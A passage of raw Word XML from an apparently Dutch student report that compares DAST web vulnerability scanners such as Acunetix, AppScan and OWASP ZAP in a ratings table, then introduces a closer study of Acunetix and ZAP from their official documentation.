            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="681A8455" w14:textId="240FB9A7" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="006B4663" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Acunetix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1487" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="09630B20" w14:textId="55107249" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="00744FE2" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Commercieel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5C53A88A" w14:textId="4B21D4C2" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="00BD2D08" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1936" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1075930C" w14:textId="6B1BCCBA" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="00F3197C" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0996EFD5" w14:textId="5473A370" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="003A4FD1" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B4663" w14:paraId="6151D5E1" w14:textId="77777777" w:rsidTr="006B4663">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1755" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E676BC6" w14:textId="6286E3B0" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="006355BC" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>edgescan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1487" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DA3EC0C" w14:textId="3270E149" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="00F2730E" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Commercieel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="409E8630" w14:textId="19E98DC3" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="006355BC" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1936" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C8EB190" w14:textId="2FF01F06" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="006355BC" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="293E97C9" w14:textId="29E2F0F6" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="006355BC" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B4663" w14:paraId="0C03B64E" w14:textId="77777777" w:rsidTr="00F2730E">
        <w:trPr>
          <w:trHeight w:val="264"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1755" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B870D1B" w14:textId="1E2BABDA" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="00F2730E" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>AppScan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AA1121" w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>(IBM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1487" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19E15CE0" w14:textId="2F7F6AF6" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="00F2730E" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Commercieel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="270E7BA8" w14:textId="4637371C" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="00F2730E" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1936" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71AAB45E" w14:textId="4F49FB8C" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="00F2730E" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CD68045" w14:textId="6444038C" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="00F2730E" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Laag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B4663" w14:paraId="3523ED0D" w14:textId="77777777" w:rsidTr="006B4663">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1755" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05757CA5" w14:textId="2B8B453C" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="008D783A" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>App Scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1487" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32E84ABA" w14:textId="7E73312E" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="008D783A" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Commercieel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="073B8329" w14:textId="2432B224" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="008D783A" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1936" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11237EBC" w14:textId="47E8CF71" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="008D783A" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19C1A6AD" w14:textId="496AFD03" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="008D783A" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B4663" w14:paraId="33441A70" w14:textId="77777777" w:rsidTr="006B4663">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1755" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E49DA06" w14:textId="28794990" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="008D783A" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>AppSpider</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1487" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F457522" w14:textId="4DF14E5F" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="008D783A" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Commercieel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="323DEAE7" w14:textId="3F5D54F5" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="008D783A" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1936" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C6967C7" w14:textId="7A9105C7" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="008D783A" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42BEF830" w14:textId="2897AE23" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="008D783A" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B4663" w14:paraId="7F77EAD9" w14:textId="77777777" w:rsidTr="006B4663">
        <w:trPr>
          <w:trHeight w:val="278"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1755" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56B6FBB9" w14:textId="5E003E85" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="008D783A" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>AVDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1487" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45BD6688" w14:textId="0ECCA8FC" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="008D783A" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Commercieel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44E3DB86" w14:textId="5C7B89A9" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="008D783A" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1936" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74696C0F" w14:textId="0A5D087E" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="008D783A" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B636720" w14:textId="6EAA8E54" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="008D783A" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B4663" w14:paraId="7AFB23E1" w14:textId="77777777" w:rsidTr="00EF2A22">
        <w:trPr>
          <w:trHeight w:val="222"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="367977D3" w14:textId="3BD7F034" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="005D6CFC" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Zed</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Attack Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1487" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="144CCECE" w14:textId="6626C60B" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="005D6CFC" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Open Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6CF6B031" w14:textId="788874F3" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="005D6CFC" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1936" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4ED24023" w14:textId="25FB9021" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="005D6CFC" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="72F34DC3" w14:textId="3ED51396" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="005D6CFC" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0DAA488F" w14:textId="77777777" w:rsidR="00BC56F0" w:rsidRPr="003B3CF1" w:rsidRDefault="00BC56F0" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56DD941E" w14:textId="77777777" w:rsidR="00CA7745" w:rsidRDefault="00CA7745" w:rsidP="00554FF4"/>
    <w:p w14:paraId="6CAC04B3" w14:textId="77777777" w:rsidR="002D52EB" w:rsidRDefault="002D52EB">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEE5041" w14:textId="005B6F83" w:rsidR="00A35EEC" w:rsidRDefault="009F3C2E" w:rsidP="00BA13E5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Uit het onderzoek van </w:t>
      </w:r>
      <w:r w:rsidR="00197537">
        <w:t xml:space="preserve">deel 3.4.2 </w:t>
      </w:r>
      <w:r w:rsidR="00EA41A1">
        <w:t xml:space="preserve">heb ik een selectie gemaakt van twee </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EA41A1">
        <w:t>DAST tools</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EA41A1">
        <w:t>. Deze tools zal ik in de komende delen onderzoeken. Hiervoor zal ik de tools uitproberen en de werking documenteren, de documentatie doornemen en onderzoeken wat voor datastructuur zij gebruiken wat zij aan data verzamelen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29288551" w14:textId="77777777" w:rsidR="00BA13E5" w:rsidRDefault="00BA13E5" w:rsidP="00BA13E5">
      <w:r>
        <w:t>De scanners die ik voor dit deel heb gekozen zijn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128F5071" w14:textId="77777777" w:rsidR="00BA13E5" w:rsidRDefault="00BA13E5" w:rsidP="00BA13E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F0DB4A0" w14:textId="77777777" w:rsidR="00BA13E5" w:rsidRDefault="00BA13E5" w:rsidP="00BA13E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ZAP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Zed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Attack Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C594E96" w14:textId="46EFBF38" w:rsidR="00BA13E5" w:rsidRDefault="00BA13E5" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Ik zal in dit onderzoek twee documenten behandelen: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00364A1D">
        <w:t xml:space="preserve"> handleiding en de </w:t>
      </w:r>
      <w:r>
        <w:t>brochure</w:t>
      </w:r>
      <w:r w:rsidR="00364A1D">
        <w:t xml:space="preserve">, beide zijn te vinden op de officiële website van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00364A1D">
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00364A1D">
        <w:t>. Voor OWASP ZAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C6341">
        <w:t>de documentatie die beschikbaar is gesteld op de index pagina van de officiële website waaronder de start gids van OWASP ZAP</w:t>
      </w:r>
      <w:r>
        <w:t>. De twee documenten bieden inzicht in de werking van beide DAST-tools</w:t>
      </w:r>
      <w:r w:rsidR="00133B9F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548A89C4" w14:textId="2F7610EC" w:rsidR="00554FF4" w:rsidRDefault="00027DBB" w:rsidP="00554FF4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vermeld </w:t>
      </w:r>
      <w:r w:rsidR="00FB31ED">
        <w:t>dat e</w:t>
      </w:r>
      <w:r w:rsidR="00554FF4">
        <w:t xml:space="preserve">en </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00554FF4">
        <w:t>DAST tool</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00554FF4">
        <w:t xml:space="preserve"> heeft drie kern processen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D3F679" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRPr="00FB7402" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7402">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Crawl &amp; Scan</w:t>
      </w:r>
